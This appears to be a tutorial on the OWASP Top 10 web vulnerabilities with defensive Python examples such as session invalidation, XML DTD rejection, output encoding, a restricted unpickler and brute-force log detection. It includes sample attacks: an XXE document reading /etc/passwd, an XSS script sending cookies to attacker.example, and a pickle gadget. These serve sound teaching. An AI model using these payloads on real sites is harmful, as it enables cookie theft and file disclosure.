OWASP Top 10 2023 Vulnerabilities

What are the OWASP Top 10 vulnerabilities in 2023?

The OWASP Web Security Testing Guide covers almost everything you would test a web application for. The methodology is comprehensive and was written by some of the best web application security practitioners.

The OWASP Top 10 is a separate, shorter document: it lists the ten most critical and most frequently seen web application vulnerability categories. The ten categories described below are those of the 2017 edition of the list (the 2021 edition reorders and merges several of them, but every category here still describes a real and common class of flaw).

OWASP Top 10 (2017 list)
1. Injection

Injection happens when an attacker supplies input that an interpreter (SQL, OS shell, LDAP, etc.) executes as code or commands, tricking the application into performing unintended actions. The most common and best-known injection attack is SQL injection (SQLi): untrusted input is concatenated into a query string, so a quote or comment sequence in the input changes the meaning of the query. The fix is to keep data and code separate, for example with parameterized queries.

2. Broken Authentication

Examples of broken authentication are an insecure login form, passwords stored in plain text, and broken logout and session management. Logout example: I log in to a website, finish my work and log out. An attacker at the same machine presses the browser's back button (or replays my old session cookie) and finds my account still logged in, because the site only cleared the cookie in the browser and never invalidated the session on the server. That is broken logout management.

Password attack example: an attacker uses Burp Suite to capture the login request, sends it to Repeater to study it and then to Intruder to brute-force usernames and passwords. This works whenever the application does not limit, slow down or lock out repeated failed attempts.
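Both flaws fixed in one place, as an added example that is not the article's code: a hypothetical AuthService that keeps sessions server-side (so logout really invalidates the token and the back button or a replayed cookie gets nothing) and locks an account after repeated failures (so the Intruder brute force stalls). The credential dictionary is constructed demo data and the clock is injectable only so the lockout window can be tested.

```python
import hmac
import secrets
import time
from collections import defaultdict

MAX_FAILURES = 5        # failed attempts allowed per account inside the window
LOCKOUT_SECONDS = 300   # length of the window and of the lockout


class AuthService:
    """Hypothetical login service with server-side sessions and a failed-login lockout."""

    def __init__(self, credentials: dict, clock=time.time):
        self._credentials = credentials       # username -> password (constructed demo data)
        self._sessions: dict[str, str] = {}   # session token -> username
        self._failures = defaultdict(list)    # username -> timestamps of recent failures
        self._clock = clock                   # injectable for testing

    def _is_locked(self, username: str) -> bool:
        now = self._clock()
        recent = [t for t in self._failures[username] if now - t < LOCKOUT_SECONDS]
        self._failures[username] = recent
        return len(recent) >= MAX_FAILURES

    def login(self, username: str, password: str):
        """Return a session token, or None if the credentials are wrong or the account is locked."""
        if self._is_locked(username):
            return None  # even a correct guess is refused while locked: the brute force stalls
        expected = self._credentials.get(username, "")
        # Constant-time comparison; unknown user and wrong password take the same failure path
        if not expected or not hmac.compare_digest(expected.encode(), password.encode()):
            self._failures[username].append(self._clock())
            return None
        self._failures[username].clear()
        token = secrets.token_urlsafe(32)  # 256-bit random token generated on the server
        self._sessions[token] = username
        return token

    def whoami(self, token: str):
        """Resolve a presented session token; None means 'not logged in'."""
        return self._sessions.get(token)

    def logout(self, token: str) -> None:
        """Invalidate the session on the server; clearing the browser cookie alone is not logout."""
        self._sessions.pop(token, None)
```

In a real deployment the session store would be a database or cache shared by all application servers, the lockout would usually be combined with a per-IP rate limit so that one attacker cannot lock legitimate users out, and every failure would be logged (see the logging section).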

3. Sensitive data exposure

Unintended data exposure is a serious problem for anyone operating a web application that holds user data. Passwords, card numbers, usernames, phone numbers, health information and other sensitive data that are stored or transmitted without encryption, or passwords that are stored without a proper salted hash, are available to anyone who can read the database, a backup, or the network traffic.

4. XML external entities

XML processors are often configured to resolve external entities, that is, to load the contents of a file or URL named in the document's DTD. An attacker who can upload or submit XML to such a parser can make the server read local files (configuration files containing database passwords, for example), probe directories and internal services on the server's behalf, or exhaust memory through entity expansion. The fix is to disable DTDs and external entity resolution in the parser.
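A defensive parser front-end, added here as an example and not part of the original article. It refuses any document that carries a DOCTYPE or ENTITY declaration before handing it to Python's ElementTree; the attack document is constructed to show what an XXE payload looks like. Rejecting every DTD is simpler and safer than trying to allow harmless ones, and it also blocks internal-entity expansion ("billion laughs") denial of service.

```python
import re
import xml.etree.ElementTree as ET

# Any DTD at all is refused: external entities, parameter entities and
# entity-expansion denial of service all require one.
DTD_PATTERN = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Constructed attack document: on a parser that resolves external entities the
# &xxe; reference is replaced by the contents of /etc/passwd in the parsed output.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<order><note>&xxe;</note></order>"""

BENIGN_DOCUMENT = b"<order><note>please gift-wrap</note></order>"


def contains_dtd(data: bytes) -> bool:
    """True if the document declares a DTD or an entity anywhere."""
    return DTD_PATTERN.search(data) is not None


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Reject any document that declares a DTD, then parse the rest normally."""
    if contains_dtd(data):
        raise ValueError("XML containing a DOCTYPE or ENTITY declaration is not accepted")
    return ET.fromstring(data)
```

Python's standard-library ElementTree does not itself fetch external entities, but many other parsers do by default; the same pre-check protects them, and the parser should additionally be configured with entity resolution off (for lxml, XMLParser(resolve_entities=False); in Java, the equivalent is disallowing the doctype-decl feature on the factory).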

5. Broken access control

In web security, access control limits which sections, pages or records a user can reach, depending on their role and needs.

Broken access control occurs when users can perform functions above their privilege level (vertical escalation, e.g. a customer calling an admin-only function) or gain access to other users' information (horizontal escalation, e.g. changing an order id in the URL to read someone else's order). The checks must be enforced on the server for every request; hiding a link in the user interface is not access control.
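The two escalations and their server-side checks, as an added example that is not from the article. The orders, users and roles are constructed demo data and the functions are hypothetical request handlers; the vulnerable handler trusts the id from the URL, the safe one verifies ownership (or the admin role) and returns the same error for "missing" and "not yours" so that ids cannot be enumerated.

```python
class Forbidden(Exception):
    """Raised when the caller may not perform the requested action."""


# Constructed demo data: order id -> record, and each user's roles.
ORDERS = {
    101: {"owner": "alice", "item": "laptop"},
    102: {"owner": "bob", "item": "phone"},
}
ROLES = {"alice": {"customer"}, "bob": {"customer"}, "carol": {"customer", "admin"}}


def _is_admin(user: str) -> bool:
    return "admin" in ROLES.get(user, set())


def get_order_vulnerable(user: str, order_id: int) -> dict:
    """Trusts the id from the URL: any logged-in user can read any order (IDOR)."""
    return ORDERS[order_id]


def get_order_safe(user: str, order_id: int) -> dict:
    """Horizontal check: the record must belong to the caller, unless the caller is an admin."""
    order = ORDERS.get(order_id)
    if order is None or (order["owner"] != user and not _is_admin(user)):
        # Same response for 'does not exist' and 'not yours': no oracle for enumeration
        raise Forbidden(f"{user} may not view order {order_id}")
    return order


def refund_order(user: str, order_id: int) -> str:
    """Vertical check: a staff-only function is verified on the server, not just hidden in the UI."""
    if not _is_admin(user):
        raise Forbidden(f"{user} is not allowed to refund orders")
    get_order_safe(user, order_id)  # admins still go through the existence check
    return f"order {order_id} refunded by {user}"
```

In a real application the ownership test is a WHERE clause on the query (owner = current user) rather than a check after loading the record, and the role check is usually a decorator or middleware applied to every admin route by default, so a forgotten check fails closed.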

6. Security misconfiguration

Attackers are always looking for ways into websites, and security misconfigurations can be an easy way in.

Developers and IT staff tend to configure for functionality, not security. The configuration of the application server, database server, proxy, the application itself and the other components in the stack must be brought in line with the security requirements: default accounts and sample applications removed, debug modes, directory listings and verbose error messages disabled, unused services switched off, security headers set, and patches applied consistently across every environment.

7. Cross-site scripting (XSS)

Data or scripts inserted by an attacker are returned by the application and executed in the victim's browser, where they can steal users' data (session cookies, form contents), deface websites, or perform actions as the user. The types of XSS are reflected (the payload comes back in the response to the request that carried it), stored (the payload is saved, e.g. in a comment, and served to every visitor) and DOM-based (client-side script writes untrusted data into the page). The defence is to encode every untrusted value for the context it lands in, and to add a Content-Security-Policy as a second layer.
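Server-side rendering with and without output encoding, as an added example that is not the article's code. The attacker's comment is constructed; the render functions are hypothetical templates. The vulnerable template concatenates the text into HTML, so the script tag is live in every reader's browser (stored XSS); the safe one entity-encodes each value with html.escape, including quotes, because the author name also lands inside an attribute.

```python
import html

# Constructed attacker input: a comment body that would exfiltrate every reader's cookies.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(author: str, body: str) -> str:
    """Untrusted text is pasted straight into HTML; the browser executes the script."""
    return f"<div class='comment'><b>{author}</b>: {body}</div>"


def render_comment_safe(author: str, body: str) -> str:
    """Every untrusted value is entity-encoded; quote=True also covers the attribute context."""
    a = html.escape(author, quote=True)
    b = html.escape(body, quote=True)
    return f"<div class='comment' data-author='{a}'><b>{a}</b>: {b}</div>"


def has_live_script(rendered: str) -> bool:
    """Crude check for the demo: does the output contain an unencoded <script tag?"""
    return "<script" in rendered.lower()
```

Template engines such as Jinja2 do this escaping automatically when autoescape is on; the bugs appear where someone marks output as safe, builds HTML by hand, or writes untrusted data into the DOM with innerHTML on the client, which no server-side encoding can fix.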

8. Insecure deserialization

Insecure deserialization, where the application turns untrusted bytes back into objects, often leads to remote code execution, because native serialization formats (Java serialization, PHP unserialize, Python pickle) let the data name which classes and callables are instantiated.

Even if a deserialization flaw does not result in remote code execution, it can be used for other attacks, including replay attacks, injection attacks and privilege escalation (for example by changing a role field inside a serialized session object).
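How the RCE happens and one way to stop it, as an added example not taken from the article. The Gadget class is constructed: its __reduce__ tells pickle to call os.getcwd() during loading, chosen because it is harmless and observable; an attacker would name os.system or similar instead. The RestrictedUnpickler is a hypothetical allow-list loader that refuses every global not explicitly permitted.

```python
import io
import os
import pickle


class Gadget:
    """Constructed 'gadget': on unpickling, pickle calls the returned callable with the arguments.

    os.getcwd is used because it is harmless; the same mechanism runs any importable callable.
    """

    def __reduce__(self):
        return (os.getcwd, ())


def build_malicious_payload() -> bytes:
    return pickle.dumps(Gadget())


def load_untrusted_vulnerable(data: bytes):
    """pickle.loads runs whatever callables the payload names: this is the remote code execution."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list of the globals the application legitimately needs; everything else is refused."""

    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_untrusted_safe(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def rejected_by_restricted_loader(data: bytes) -> bool:
    """True if the allow-list loader refuses the payload instead of executing it."""
    try:
        load_untrusted_safe(data)
    except pickle.UnpicklingError:
        return True
    return False
```

The allow-list is a mitigation for code that cannot be changed; the real fix is to not accept native serialization from untrusted sources at all and use a data-only format (JSON with schema validation), and, where serialized blobs must cross a trust boundary, to sign them and verify the signature before parsing.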

9. Using components with known vulnerabilities

There is a wealth of reusable software components available to application developers. Many of these components are open source, developed with voluntary contributions, and available for free. Developers can quickly build feature-rich applications using these third-party components, but the application inherits every vulnerability in them: a component with a published vulnerability, or an outdated version of one, is an entry point attackers scan for directly. Keeping an inventory of components and their versions, comparing it against advisory feeds, and upgrading promptly is the only defence.
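A minimal dependency audit, added here as an example and not part of the article. The requirements file and the advisory list are constructed (hypothetical package names and advisory ids, not real CVEs); the point is the version comparison, which must be numeric so that 2.10 is recognised as newer than 2.9. In practice the advisory feed comes from a service such as OSV.dev and the tool is pip-audit or the equivalent for the ecosystem.

```python
from typing import Iterable

# Constructed advisory feed: a package is affected if introduced <= version < fixed.
ADVISORIES = [
    {"id": "ADV-0001", "package": "examplexml", "introduced": "0", "fixed": "2.4.1"},
    {"id": "ADV-0002", "package": "examplejwt", "introduced": "1.0.0", "fixed": "1.7.3"},
]

# Constructed pinned requirements, as a lockfile would list them.
REQUIREMENTS = """\
# web app dependencies
examplexml==2.3.0
examplejwt==1.7.3
exampleweb==4.0.2
"""


def parse_version(text: str) -> tuple:
    """'2.4.1' -> (2, 4, 1): compare numerically, not as strings. Assumes dotted numeric versions."""
    return tuple(int(part) for part in text.split("."))


def parse_requirements(text: str) -> dict:
    """Return {package: version} for exact pins; anything unpinned cannot be audited, so it is an error."""
    pinned = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, _, version = line.partition("==")
        if not version:
            raise ValueError(f"unpinned requirement: {line!r}")
        pinned[name.strip().lower()] = version.strip()
    return pinned


def audit(pinned: dict, advisories: Iterable[dict]) -> list:
    """List every pinned package whose version falls inside an advisory's affected range."""
    findings = []
    for adv in advisories:
        version = pinned.get(adv["package"].lower())
        if version is None:
            continue
        if parse_version(adv["introduced"]) <= parse_version(version) < parse_version(adv["fixed"]):
            findings.append({
                "package": adv["package"],
                "installed": version,
                "advisory": adv["id"],
                "fixed_in": adv["fixed"],
            })
    return findings
```

Run in CI against the lockfile, a non-empty findings list should fail the build; transitive dependencies must be included, which is why the input is the resolved lockfile rather than the hand-written requirements.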

10. Insufficient logging and monitoring

Without adequate logging and monitoring, the attacks described above (brute-forced logins, injection attempts, access to other users' records) go unnoticed, often for months. Log every login attempt, including failures, with the account, source address and timestamp; alert on repeated failures and on unusual activity; check firewall and application logs together; and keep the logs where an attacker who compromises the application cannot delete them. Unvalidated redirects, where an unchecked parameter sends a user to a malicious site, should also be validated against an allow-list and logged.
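Detection logic run over sample log lines, as an added example that is not part of the article. The log lines and their format are constructed for a hypothetical application; the rule is the classic one: alert when a single source address produces five or more failed logins within five minutes, and raise a second, higher-priority alert if a successful login from that address follows, which is what a brute force that worked looks like.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines in a hypothetical application format.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z auth login_failed user=admin src=203.0.113.5
2024-03-01T10:00:02Z auth login_failed user=admin src=203.0.113.5
2024-03-01T10:00:02Z auth login_ok user=alice src=198.51.100.7
2024-03-01T10:00:03Z auth login_failed user=root src=203.0.113.5
2024-03-01T10:00:04Z auth login_failed user=test src=203.0.113.5
2024-03-01T10:00:05Z auth login_failed user=guest src=203.0.113.5
2024-03-01T10:00:06Z auth login_ok user=admin src=203.0.113.5
2024-03-01T10:09:00Z auth login_failed user=bob src=198.51.100.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<event>login_\w+) user=(?P<user>\S+) src=(?P<src>\S+)$"
)

THRESHOLD = 5               # failures from one source ...
WINDOW = timedelta(minutes=5)  # ... inside this sliding window


def parse_line(line: str):
    """Return (timestamp, event, user, src) or None for lines that do not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, m["event"], m["user"], m["src"]


def detect_brute_force(log_text: str) -> list:
    """Sliding-window count of failures per source; flag a success from an already-flagged source."""
    failures = defaultdict(deque)  # src -> timestamps of failures still inside the window
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, event, user, src = parsed
        window = failures[src]
        while window and ts - window[0] > WINDOW:
            window.popleft()  # drop failures older than the window
        if event == "login_failed":
            window.append(ts)
            if len(window) >= THRESHOLD and src not in alerted:
                alerted.add(src)
                alerts.append({"type": "brute_force", "src": src, "failures": len(window), "at": ts})
        elif event == "login_ok" and src in alerted:
            alerts.append({"type": "success_after_brute_force", "src": src, "user": user, "at": ts})
    return alerts
```

The same rule is a few lines in any SIEM query language; what matters is that the application emits the failure events in the first place, with the source address and account, and that someone is paged when the second alert type fires.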